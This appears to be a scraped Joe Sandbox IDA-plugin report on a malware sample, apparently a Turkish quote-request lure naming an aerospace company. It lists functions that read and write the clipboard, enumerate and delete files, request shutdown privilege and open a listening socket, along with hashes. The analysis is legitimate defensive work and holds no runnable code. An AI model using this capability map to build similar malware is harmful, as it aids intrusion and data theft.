Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: ec24d56429d9e2fb8b1f697b03cf0f581ca646c7b589fabfff912f46760fbbe5
Instruction ID: 655e5ba9c5cb45295ece50a14e34ecbe604112b7cfb674f38edc6f36e0304c72
Opcode Fuzzy Hash: ec24d56429d9e2fb8b1f697b03cf0f581ca646c7b589fabfff912f46760fbbe5
Instruction Fuzzy Hash: 6571AC7590024AEBDF11DFE5EC48BEEBBB8BF18300F148125E904A7190DBB4AA41CB60

Function 001FEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0021CC08), ref: 001FEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 001FEB37
GetClipboardData.USER32(0000000D), ref: 001FEB43
CloseClipboard.USER32 ref: 001FEB4F
GlobalLock.KERNEL32(00000000), ref: 001FEB87
CloseClipboard.USER32 ref: 001FEB91
GlobalUnlock.KERNEL32(00000000), ref: 001FEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 001FEBC9
GetClipboardData.USER32(00000001), ref: 001FEBD1
GlobalLock.KERNEL32(00000000), ref: 001FEBE2
GlobalUnlock.KERNEL32(00000000), ref: 001FEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 001FEC38
GetClipboardData.USER32(0000000F), ref: 001FEC44
GlobalLock.KERNEL32(00000000), ref: 001FEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001FEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001FEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001FECD2
GlobalUnlock.KERNEL32(00000000), ref: 001FECF3
CountClipboardFormats.USER32 ref: 001FED14
CloseClipboard.USER32 ref: 001FED59

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: d895eb6f866c9646e8cf8b47b046eccc307511e6a75468af550e7b45307bfde4
Instruction ID: 449a2a36b45470a3b6d8adbbb8ab31a5a02c45a67713eff555c9c2ad66d80027
Opcode Fuzzy Hash: d895eb6f866c9646e8cf8b47b046eccc307511e6a75468af550e7b45307bfde4
Instruction Fuzzy Hash: AF61DF38244305AFD300EF64E888F7A77E8AF94714F288559F956972A2CF31DE05CB62

Function 001F698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001F69BE
FindClose.KERNEL32(00000000), ref: 001F6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001F6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001F6A75

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 001F6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 001F6ADF

Strings

%4d, xrefs: 001F6BB1
%02d, xrefs: 001F6C00, 001F6C0A, 001F6C5A, 001F6CAA, 001F6CFA, 001F6D4A
%03d, xrefs: 001F6DA2
%4d%02d%02d%02d%02d%02d, xrefs: 001F6B6A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 001F6B32

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: ed999fd03a4f2675bde4b4de27a106cd53a0727e50fa65d9aa2146178c3f172e
Instruction ID: e202edfe48a0fe0c268dcd550ae0aeb6829d18c195d2d622c86c724818c66e67
Opcode Fuzzy Hash: ed999fd03a4f2675bde4b4de27a106cd53a0727e50fa65d9aa2146178c3f172e
Instruction Fuzzy Hash: E7D16CB2508304AEC714EBA4D885EBBB7ECAFA9704F04491DF685D7191EB74DA04CB62

Function 001F9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 001F9663
GetFileAttributesW.KERNEL32(?), ref: 001F96A1
SetFileAttributesW.KERNEL32(?,?), ref: 001F96BB
FindNextFileW.KERNEL32(00000000,?), ref: 001F96D3
FindClose.KERNEL32(00000000), ref: 001F96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 001F96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 001F974A
SetCurrentDirectoryW.KERNEL32(00246B7C), ref: 001F9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 001F9772
FindClose.KERNEL32(00000000), ref: 001F977F
FindClose.KERNEL32(00000000), ref: 001F978F

Strings

*.*, xrefs: 001F96F5

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 02c168bcab5d3dcdcf89278debfe7f7c3b4e3c203e27381f69565ff2b7238240
Instruction ID: 200fc311155e09c4064743d549cd3a13f1422dce1ab8462bc1749dc1335d4ce3
Opcode Fuzzy Hash: 02c168bcab5d3dcdcf89278debfe7f7c3b4e3c203e27381f69565ff2b7238240
Instruction Fuzzy Hash: 1531BF7654061D6BDB14BFB4EC0CBEE77AC9F1A321F208156FA15E20A0DB30D9448E54

Function 001F979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 001F97BE
FindNextFileW.KERNEL32(00000000,?), ref: 001F9819
FindClose.KERNEL32(00000000), ref: 001F9824
FindFirstFileW.KERNEL32(*.*,?), ref: 001F9840
SetCurrentDirectoryW.KERNEL32(?), ref: 001F9890
SetCurrentDirectoryW.KERNEL32(00246B7C), ref: 001F98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 001F98B8
FindClose.KERNEL32(00000000), ref: 001F98C5
FindClose.KERNEL32(00000000), ref: 001F98D5

Part of subcall function 001EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001EDB00

Strings

*.*, xrefs: 001F983B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 169e9eac17367fc76f7047b18668076983179eb726ca147826dd89bb63ed4da4
Instruction ID: 86c9bb200e993ce8fe21576b8dd10586c7719e1b7fdcaf7188803033f7430d99
Opcode Fuzzy Hash: 169e9eac17367fc76f7047b18668076983179eb726ca147826dd89bb63ed4da4
Instruction Fuzzy Hash: 8D31E13554061D6ADB24BFB4EC48BEE37AC9F57360F2481A6FA10A2090DB30DE948A60

Function 001F8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 001F8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 001F8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001F8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001F8310
SetCurrentDirectoryW.KERNEL32(?), ref: 001F8324
SetCurrentDirectoryW.KERNEL32(?), ref: 001F8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001F838C
SetCurrentDirectoryW.KERNEL32(?), ref: 001F8395

Strings

*.*, xrefs: 001F839B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 4538957c4b3dddbc891c57a3946628fb512ff36f230be4c0dbb6d92db74e6c26
Instruction ID: 3faf6d9101fd670f78b4d7b0304539f6e3b9bdcb0261d9885f3bf554d4599f45
Opcode Fuzzy Hash: 4538957c4b3dddbc891c57a3946628fb512ff36f230be4c0dbb6d92db74e6c26
Instruction Fuzzy Hash: DD6189B65083099FCB10EF60D8449AEB3E8FF99314F04891DFA9987251DB31EA45CB92

Function 001ED076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2

Part of subcall function 001EE199: GetFileAttributesW.KERNEL32(?,001ECF95), ref: 001EE19A

FindFirstFileW.KERNEL32(?,?), ref: 001ED122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 001ED1DD
MoveFileW.KERNEL32(?,?), ref: 001ED1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 001ED20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 001ED237

Part of subcall function 001ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,001ED21C,?,?), ref: 001ED2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 001ED253
FindClose.KERNEL32(00000000), ref: 001ED264

Strings

\*.*, xrefs: 001ED0CD, 001ED0D6, 001ED0EB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 797bed2bc2c7c86ca0a0b6ba2e55f7d0925e1d6273784b4db4007857a9610560
Instruction ID: fb95d6176ac639bafc28c54ddf8b61791f3003db680c4977abbd1151abe26c7c
Opcode Fuzzy Hash: 797bed2bc2c7c86ca0a0b6ba2e55f7d0925e1d6273784b4db4007857a9610560
Instruction Fuzzy Hash: BA61493180514EABCF05EBE1EA929FDB7B5AF25304F648165E40277191EB31AF09CF61

Function 001FED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 001FED91
EmptyClipboard.USER32 ref: 001FED97
GlobalAlloc.KERNEL32(00000002,?), ref: 001FEDAC
CloseClipboard.USER32 ref: 001FEEA3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: ce61af117eadf08d0890c6e76e0d4387b62f469606b43b0318dfe5409b5f2506
Instruction ID: 83bcf60e571f1243245fd16f250c9ed0f0b60bd8eaa1632092c5a9da78c2f99d
Opcode Fuzzy Hash: ce61af117eadf08d0890c6e76e0d4387b62f469606b43b0318dfe5409b5f2506
Instruction Fuzzy Hash: 1D41CE35204651AFE320DF15E888B69BBE5FF54328F24C099E5158BA72CB35ED42CB90

Function 001EE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 001E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001E170D
Part of subcall function 001E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001E173A
Part of subcall function 001E16C3: GetLastError.KERNEL32 ref: 001E174A

ExitWindowsEx.USER32(?,00000000), ref: 001EE932

Strings

SeShutdownPrivilege, xrefs: 001EE902
@, xrefs: 001EE925
, xrefs: 001EE920
, xrefs: 001EE95C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 8d5d9bb68e75577e1c14244a3544d0d357c759fcc448bd878a8ae4379c6e3209
Instruction ID: c6990d969b1bdae1de0dbef9d3f53d82fb5332901489d1305ba48e6da9e3adbd
Opcode Fuzzy Hash: 8d5d9bb68e75577e1c14244a3544d0d357c759fcc448bd878a8ae4379c6e3209
Instruction Fuzzy Hash: C1012B72610651BBEB1866B6AC89FFF72DC9724744F154421FC03E31D3DBA05C4485A0

Function 00201204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00201276
WSAGetLastError.WSOCK32 ref: 00201283
bind.WSOCK32(00000000,?,00000010), ref: 002012BA
WSAGetLastError.WSOCK32 ref: 002012C5
closesocket.WSOCK32(00000000), ref: 002012F4
listen.WSOCK32(00000000,00000005), ref: 00201303
WSAGetLastError.WSOCK32 ref: 0020130D
closesocket.WSOCK32(00000000), ref: 0020133C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 9459866fa6abe1495f5de7945fcd37cf42183aa69e0699c405bd16bd3dc41be1
Instruction ID: b657892dd15f846bc240d49b2719ccb2cbf8ca4f6c1228ba581f219f443446f1
Opcode Fuzzy Hash: 9459866fa6abe1495f5de7945fcd37cf42183aa69e0699c405bd16bd3dc41be1
Instruction Fuzzy Hash: 92419E356002119FD710DF68D4C8B69BBE5AF56318F288088E8568F2D7C771ED91CBE0

Function 001BB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001BB9D4
_free.LIBCMT ref: 001BB9F8
_free.LIBCMT ref: 001BBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00223700), ref: 001BBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0025121C,000000FF,00000000,0000003F,00000000,?,?), ref: 001BBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00251270,000000FF,?,0000003F,00000000,?), ref: 001BBC36
_free.LIBCMT ref: 001BBD4B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 9d2bfdf1cafc0e01fef8fd2373865fdbdca8d95e882065b7af3503f7e80cd807
Instruction ID: 0fe0afadc500ded225db5901b2c80948955cdff72b09c8a00dbc6fb924608ad2
Opcode Fuzzy Hash: 9d2bfdf1cafc0e01fef8fd2373865fdbdca8d95e882065b7af3503f7e80cd807
Instruction Fuzzy Hash: 4DC11471908204AFCB24EF79DC95BEEBBA8EF51310F24419AE894D7651EBB08E41C750

Function 001ED3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2

Part of subcall function 001EE199: GetFileAttributesW.KERNEL32(?,001ECF95), ref: 001EE19A

FindFirstFileW.KERNEL32(?,?), ref: 001ED420
DeleteFileW.KERNEL32(?,?,?,?), ref: 001ED470
FindNextFileW.KERNEL32(00000000,00000010), ref: 001ED481
FindClose.KERNEL32(00000000), ref: 001ED498
FindClose.KERNEL32(00000000), ref: 001ED4A1

Strings

\*.*, xrefs: 001ED3F2

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 58a005dbb04c9ebbed939a8acd89788b752142096add1c5f3aa2f16a6ef3b456
Instruction ID: 9bbb26ab26e3d2c79ea9c4f713418282316304ed236ebc720dfb0fdc3ac8f0c8
Opcode Fuzzy Hash: 58a005dbb04c9ebbed939a8acd89788b752142096add1c5f3aa2f16a6ef3b456
Instruction Fuzzy Hash: 13312D710087859BC305FF65E8958AFB7A8BFB6314F444A1DF8D592191EB30AA09CB63

Function 001BE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001BE645

Strings

1#QNAN, xrefs: 001BF84B
1#IND, xrefs: 001BF83D
1#SNAN, xrefs: 001BF844
1#INF, xrefs: 001BF852

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: da72017c4e742426732803ec88bfd2b58abf8f49e0e0332277ff5dfe5cf5db69
Instruction ID: ae5e6d81bf044b7cb88a72d32ee1752148628a292a37d77ea5afb5406a1aa1ff
Opcode Fuzzy Hash: da72017c4e742426732803ec88bfd2b58abf8f49e0e0332277ff5dfe5cf5db69
Instruction Fuzzy Hash: 31C22971E086288FDB29CE28DD447EAB7F5EB49305F1541EAD84DE7241E774AE828F40

Function 001F648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001F64DC
CoInitialize.OLE32(00000000), ref: 001F6639
CoCreateInstance.OLE32(0021FCF8,00000000,00000001,0021FB68,?), ref: 001F6650
CoUninitialize.OLE32 ref: 001F68D4

Strings

.lnk, xrefs: 001F64BA, 001F6524, 001F65E0

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 6953a7180962c418b3e0516a3a3d2965e627cbc9acb18bbf5c92b1d3952167b9
Instruction ID: 863c39607d118833e4540074bf9d6add073512cd8b991ec9a3fda79017a343f5
Opcode Fuzzy Hash: 6953a7180962c418b3e0516a3a3d2965e627cbc9acb18bbf5c92b1d3952167b9
Instruction Fuzzy Hash: 78D15971508305AFC304EF24C89196BB7E8FFA9304F14496DF5959B2A1EB71EE05CBA2

Function 002022DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002022E8

Part of subcall function 001FE4EC: GetWindowRect.USER32(?,?), ref: 001FE504

GetDesktopWindow.USER32 ref: 00202312
GetWindowRect.USER32(00000000), ref: 00202319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00202355
GetCursorPos.USER32(?), ref: 00202381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002023DF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

